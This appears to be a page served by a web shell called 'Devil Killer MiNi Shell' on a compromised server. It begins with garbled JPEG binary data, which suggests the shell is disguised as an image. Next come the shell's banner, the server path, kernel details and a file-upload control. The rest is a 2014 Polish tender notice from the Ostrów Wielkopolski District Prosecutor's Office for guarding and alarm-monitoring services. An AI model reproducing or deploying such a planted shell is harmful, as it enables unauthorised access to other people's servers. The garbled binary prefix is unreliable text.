JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140311/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140311/51323-N-2014.html

<p class="kh_header"><b>Ostrów Wielkopolski: a)	usługi ochrony osób i mienia realizowane w formie bezpośredniej ochrony fizycznej obiektów Prokuratury Okręgowej w Ostrowie Wielkopolskim, 
b)	usługi ochrony osób i mienia prokuratur rejonowych okręgu ostrowskiego polegającej na: 
- stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
- reagowaniu grup interwencyjnych.</b><br>
<b>Numer ogłoszenia: 51323 - 2014; data zamieszczenia: 11.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa w Ostrowie Wielkopolskim , ul. Krotoszyńska 37, 63-400 Ostrów Wielkopolski, woj. wielkopolskie, tel. 062 5918415, faks 062 5928165.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ostrow.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> a)	usługi ochrony osób i mienia realizowane w formie bezpośredniej ochrony fizycznej obiektów Prokuratury Okręgowej w Ostrowie Wielkopolskim, 
b)	usługi ochrony osób i mienia prokuratur rejonowych okręgu ostrowskiego polegającej na: 
- stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
- reagowaniu grup interwencyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia w zakresie:
a)	usługi ochrony osób i mienia realizowane w formie bezpośredniej ochrony fizycznej obiektów Prokuratury Okręgowej w Ostrowie Wielkopolskim, 
b)	usługi ochrony osób i mienia prokuratur rejonowych okręgu ostrowskiego polegającej na: 
- stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, 
- reagowaniu grup interwencyjnych. 

Ochrona osób i mienia będzie realizowana zgodnie z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i  mienia (Dz.U.2005.145.1221 ze zm.). 

I.	W zakresie realizacji usług opisanych w punktach a i b przedmiotu postępowania:  
1)	Wykonawca gwarantuje zatrudnienie takiej liczby pracowników, która zapewni należyte wykonanie usługi; 
2)	Wykonawca zobowiązany jest do prowadzenia na bieżąco wykazu pracowników wykonujących usługi na rzecz Zamawiającego - do wglądu w siedzibie Zamawiającego; 
3)	Wykonawca, jego pracownicy, ewentualnie podwykonawca oraz jego pracownicy zobowiązani są do zachowania w tajemnicy wszystkich wiadomości uzyskanych podczas wykonywania umowy, jak i po jej zakończeniu;   
4)	Wykonawca ponosi pełną odpowiedzialność za wszelkie wyrządzone szkody poniesione przez Zamawiającego w czasie realizacji umowy, powstałe na skutek niewykonania lub nienależytego wykonania obowiązków określonych w umowie;
5)	Wykonawca zostanie obciążony karami umownymi za nieprawidłowości w wykonywaniu umowy;
6)	Wykonawca dokona oznakowania obiektów swoim logo na czas trwania umowy w terminie 24 godzin od rozpoczęcia realizacji umowy. Po zakończeniu umowy Wykonawca zobowiązany jest w terminie 24 godzin usunąć oznakowanie we własnym zakresie i na własny koszt oraz przywrócić do stanu pierwotnego miejsca, gdzie były zamieszczone oznakowania Wykonawcy;
7)	Wykonawca wyposaży swoich pracowników w umundurowanie, sprzęt i urządzenia niezbędne do wykonywania usługi;
8)	Pracownicy Wykonawcy muszą posiadać legitymację kwalifikowanego pracownika ochrony fizycznej przed dopuszczeniem ich do wykonywania zadań związanych z ochroną osób i mienia. 

II.	Zadania pracowników ochrony - w zakresie realizacji usług opisanych w punktach a i b przedmiotu postępowania:  
1)	ochrona obiektów, pomieszczeń i urządzeń przed dostępem do nich osób nieupoważnionych;
2)	zapewnienie bezpieczeństwa osób znajdujących się w granicach ochranianych obiektów;
3)	ochrona mienia znajdującego się na chronionym obszarze przed kradzieżą, zniszczeniem lub uszkodzeniem;
4)	zapobieganie zakłóceniom porządku publicznego na terenie obiektów oraz powiadomienie Zamawiającego o zdarzeniach powodujących naruszenie porządku,
5)	reagowanie na wszelkie przypadki zakłócania porządku publicznego - ujęcie osób podejrzanych w celu niezwłocznego przekazania Policji;
6)	pracownicy ochrony przybywają na służbę w stanie zdrowia umożliwiającym jej pełnienie;
7)	sumienne i dokładne wykonywanie zadań służbowych w celu zapewnienia bezpieczeństwa i ochrony obiektów;
8)	ścisłe przestrzeganie dyscypliny pracy;
9)	przestrzeganie zasad regulaminowego zachowania się w czasie wykonywania obowiązków; 
10)	informowanie Zamawiającego o wszystkich nieprawidłowościach zaobserwowanych w trakcie pełnienia służby, mających wpływ na bezpieczeństwo pracowników i ochronę obiektów;
11)	w przypadku zaistnienia sytuacji stanowiących zagrożenie dla osób lub mienia  Zamawiającego podejmowanie interwencji zgodnie z przepisami Ustawy o ochronie osób i mienia oraz zasad stanu wyższej konieczności i obrony koniecznej; korzystanie z pomocy załóg interwencyjnych zgodnie z przyjętymi u Wykonawcy procedurami;
12)	w razie zaistnienia okoliczności, o których mowa w pkt. 11, niezwłoczne powiadomienie wszelkimi dostępnymi środkami odpowiednie służby publiczne i Zamawiającego;  
13)	pracownicy ochrony muszą być w pełni sprawni fizycznie i psychicznie, niekarani sądownie, 
14)	dysponowanie stosownymi uprawnieniami do wykonywania przedmiotu umowy, 
15)	stosowanie się do aktualnych przepisów ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U.2005.145.1221 z poźn. zmianami) oraz innych aktów prawnych wydanych na jej podstawie i związanych z realizacją usługi w trakcie trwania umowy. 

ponadto : 

III.	Zadania ochrony - w zakresie realizacji usługi opisanej w punkcie a tytułu postępowania, tj. usługi ochrony osób i mienia realizowane w formie bezpośredniej ochrony fizycznej obiektów Prokuratury Okręgowej w Ostrowie Wielkopolskim, położnej przy ulicy Krotoszyńskiej 37 (budynek biurowy, garaż służbowy): 
1)	wykonywanie usługi w budynku biurowym w dni robocze od godziny 07.00 do godziny 16.00 przez dwóch umundurowanych pracowników ochrony, wyposażonych w pistoletowe miotacze gazu obezwładniającego, pałki typu tonfa i kajdanki, a  od godziny 16.00 do godziny 07.00 przez jednego umundurowanego kwalifikowanego pracownika ochrony, wyposażonego w pistoletowy miotacz gazu obezwładniającego, pałkę typu tonfa i kajdanki; 
2)	wykonywanie usługi w dni wolne i ustawowo wolne od pracy od godziny 07.00 do godziny 07.00 dnia następnego przez jednego umundurowanego kwalifikowanego pracownika ochrony, wyposażonego w pistoletowy miotacz gazu obezwładniającego, pałkę typu tonfa i kajdanki;
3)	przestrzeganie ustaleń zawartych w zarządzeniach i innych przepisach dotyczących ochranianego obiektu i regulujących sprawy funkcjonowania prokuratury; 
4)	prowadzenie dokumentacji służby ochrony i odnotowywanie w niej wszelkich wydarzeń, stwierdzonych nieprawidłowości, braków, usterek, a w przypadku gdy godzą one w bezpieczeństwo ochranianego obiektu niezwłoczne meldowanie o tym Zamawiającemu; 
5)	wyposażenie przez Wykonawcę pracowników ochrony w dokumentacji służby ochrony - we własnym zakresie i na swój koszt; 
6)	wykonywanie czynności związanych z obsługą interesantów, w tym :
a)	informowanie sekretariatu właściwej komórki organizacyjnej (lub zainteresowanego pracownika) o przybyłych interesantach,
b)	udzielanie niezbędnych informacji interesantom,
c)	wydawanie i odbieranie kart identyfikacyjnych (wypisywanie przepustek) na podstawie dokumentu stwierdzającego tożsamość,
d)	doprowadzanie i odprowadzanie interesantów do właściwej komórki organizacyjnej; 
7)	obsługiwanie, kontrolowanie i nadzorowanie ruchu osobowego i materiałowego, w tym przy użyciu odpowiednich urządzeń, 
8)	monitorowanie oraz reagowanie na wskazania systemów elektronicznych wspomagających ochronę fizyczną; 
9)	załączanie i kontrola załączenia systemów alarmowych zainstalowanych w obiekcie; 
10)	przeprowadzanie kontroli, stanu zabezpieczenia budynku i pomieszczeń pod względem przeciwpożarowym, dostępności osób niepowołanych, skuteczności zamknięć okien i drzwi; 
11)	zamykanie i otwieranie drzwi wejściowych do biurowca o ustalonych godzinach; 
12)	przechowywanie kluczy do pomieszczeń i każdorazowe odnotowywanie w odpowiedniej dokumentacji daty i godziny ich wydania i przyjęcia; 
13)	nadzorowanie ruchu pojazdów na wewnętrznym parkingu;
14)	wykonywanie innych zadań związanych z ochroną budynku doraźnie zleconych przez przełożonych, w tym asystowanie podczas wykonywania jednorazowych czynności usługowych przez pracowników firm zewnętrznych w obrębie obiektu; 
15)	przestrzeganie przepisów bhp, ppoż., itd. oraz utrzymywanie należytego porządku w zajmowanym pomieszczeniu ochrony;
16)	poddanie pracowników przez Wykonawcę i na jego koszt przeszkoleniu w zakresie bhp, ppoż.; 
17)	pracownicy ochrony muszą posiadać znajomość lokalizacji głównych wyłączników prądu oraz sieci wodno - kanalizacyjnej i innych zainstalowanych w obiekcie; 
18)	pracownicy ochrony w ramach ochrony garażu służbowego zobowiązani są zachować się według procedur bezpieczeństwa, które zostaną mu przekazane przez Zamawiającego.

IV. Zadania ochrony - w zakresie realizacji usługi opisanej w punkcie b tytułu postępowania, tj. usługi ochrony osób i mienia prokuratur rejonowych okręgu ostrowskiego polegającej na: 
- stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych,  
- reagowaniu grup interwencyjnych : 
1)	wykonywanie usługi ochrony osób i mienia poprzez: stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych, reagowanie grup interwencyjnych w obrębie niżej wymienionych prokuratur rejonowych:  
Prokuratury Rejonowej w Jarocinie, Aleja Niepodległości 19, 63-200 Jarocin, 
Prokuratury Rejonowej w Kaliszu, Plac Świętego Józefa 5, 62-800 Kalisz, 
Prokuratury Rejonowej w Kępnie, Aleje Marcinkowskiego 10, 63-600 Kępno, 
Prokuratury Rejonowej w Krotoszynie, Park Wojska Polskiego 2, 63-700 Krotoszyn, 
Prokuratury Rejonowej w Ostrzeszowie, ulica Zamkowa 33, 63-500 Ostrzeszów, 
Prokuratury Rejonowej w Pleszewie, Plac Kościelny 1, 63-300 Pleszew;
2)	wykonywanie usługi polega na całodobowym, przez siedem dni w tygodniu, czuwaniu nad strzeżonymi obiektami poprzez monitorowanie za pomocą nadajników odbierających sygnały z systemów alarmowych Zamawiającego i wysyłania ich do centrum monitorowania alarmów Wykonawcy. Urządzenia te muszą zapewniać co najmniej dwutorowy sposób transmisji sygnału oraz podejmowanie interwencji przez grupę interwencyjną Wykonawcy;
3)	interwencja grupy interwencyjnej zostanie podjęta natychmiast po otrzymaniu sygnału alarmowego. Celem interwencji jest udaremnienie wszelkimi dostępnymi środkami powstania szkody na mieniu i zdrowiu Zamawiającego lub osób trzecich przebywających w obiekcie oraz zabezpieczenie miejsca powstania szkody. Czas dojazdu grupy interwencyjnej nie może przekroczyć 15 minut od chwili otrzymania sygnału od centrum monitorowania alarmów; 
4)	zapewnienie przez Wykonawcę gotowości podjęcia interwencji w sytuacjach zagrożenia (na każdy sygnał emitowany przez system monitoringu lub wezwanie przez pracownika prokuratury) przez uzbrojoną, wyszkoloną i sprawną fizycznie grupę interwencyjną;
5)	podjęcie interwencji z jednoczesnym powiadomieniem Policji lub Straży Pożarnej (w zależności od rodzaju alarmu) przez grupę interwencyjną na każdy sygnał emitowany przez monitorowany lokalny system alarmowy; 
6)	fizyczne nadzorowanie obiektów w przypadku naruszenia stanu bezpieczeństwa monitorowanych obiektów do czasu przybycia upoważnionego przedstawiciela Zamawiającego; 
7)	w ramach realizacji zamówienia Wykonawca na swój koszt zamontuje w prokuraturach własne nadajniki monitoringu umożliwiające dwutorową transmisję do swojej stacji monitoringu. Ponadto jedną z  prokuratur wyposaży w radiolinię napadową z 2 pilotami; 
8)	Wykonawca zamontuje, uruchomi i sprawdzi poprawność działania w obiektach Zamawiającego użyczonego sprzętu. Montaż sprzętu odbędzie się w obecności przedstawiciela Zamawiającego. Powyższa czynność odbędzie się w terminie do rozpoczęcia wykonywania usługi; 
9)	szczegółowe warunki współpracy z poszczególnymi prokuraturami rejonowymi okręgu ostrowskiego zostaną ustalone w kartach informacyjnych obiektów; 
10)	Wykonawca zobowiązuje się rejestrować sygnały przyjęte z lokalnych systemów alarmowych i do natychmiastowego powiadomienia Zamawiającego w przypadku stwierdzenia zakłóceń w działaniu urządzeń systemów alarmowych,
11)	Wykonawca udostępnia i przekazuje nieodpłatnie Zamawiającemu wyciągi z odpowiednich rejestrów włącznie ze wskazaniem czasu reakcji grup interwencyjnych po otrzymaniu sygnału alarmowego;
12)	Wykonawca zobowiązuje się nie pobierać opłaty od Zamawiającego za wywołanie próbnego alarmu, celem sprawdzenia czasu dojazdu grupy interwencyjnej. Dopuszcza się wywołanie próbnego alarmu nie częściej niż jeden raz w miesiącu w każdym chronionym obiekcie;
13)	Zamawiający zastrzega sobie prawo do zmniejszenia liczby jednostek prokuratur objętych przedmiotową usługą, bez podawania przyczyny takiej decyzji. 

Termin realizacji umowy : od 01.04.2014 r. od godziny 12.00 do 30.06.2015 r. do godziny 12.00..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia, wydanej na podstawie ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz. U. z 2005 roku, Nr 145, poz. 1221 ze zmianami)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonawca wykonał lub wykonuje minimum 3 usługi o wartości 150.000,00 zł. brutto każda ochrony osób i/lub mienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	wypełniony i podpisany formularz ofertowy,
2.	oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 ustawy,
3.	oświadczenie o braku podstaw do wykluczenia na podstawie art. 24 ust. 1  ustawy,
4.	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
